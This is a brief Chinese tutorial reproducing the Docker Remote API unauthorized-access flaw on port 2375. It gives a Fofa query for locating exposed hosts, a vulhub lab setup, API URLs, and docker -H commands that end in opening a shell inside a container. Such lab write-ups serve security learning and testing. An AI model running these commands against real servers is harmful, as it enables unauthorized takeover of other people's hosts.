Docker Remote API 未授权访问漏洞
Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的LINUX机器上,也可以实现虚拟化。
Docker swarm 是一个将docker集群变成单一虚拟的docker host工具,使用标准的Docker API,能够方便docker集群的管理和扩展,由docker官方提供。
漏洞信息
Docker Remote API如配置不当可导致未授权访问,被攻击者恶意利用。攻击者无需认证即可访问到Docker数据,可能导致敏感信息泄露,黑客也可以删除 Docker上的数据,直接访问宿主机上的敏感信息,或对敏感文件进行修改,最终完全控制服务器。
步骤一:使用以下Fofa语句对Docker产品进行搜索或者使用vulhub提供的镜像来复现
#fofa语法
port="2375"
#vulhub靶场
cd vulhub/docker/unauthorized-rce
vi docker-compose.yml
docker-compose up -d
访问网站
步骤二:直接使用浏览器访问以下路径
http://ip:2375/version #查看版本信息
http://ip:2375/info #查看容器信息
docker -H tcp://192.168.30.138:2375 ps
docker -H tcp://192.168.30.138:2375 version
docker -H tcp://192.168.30.138:2375 exec -it 1f4 /bin/bash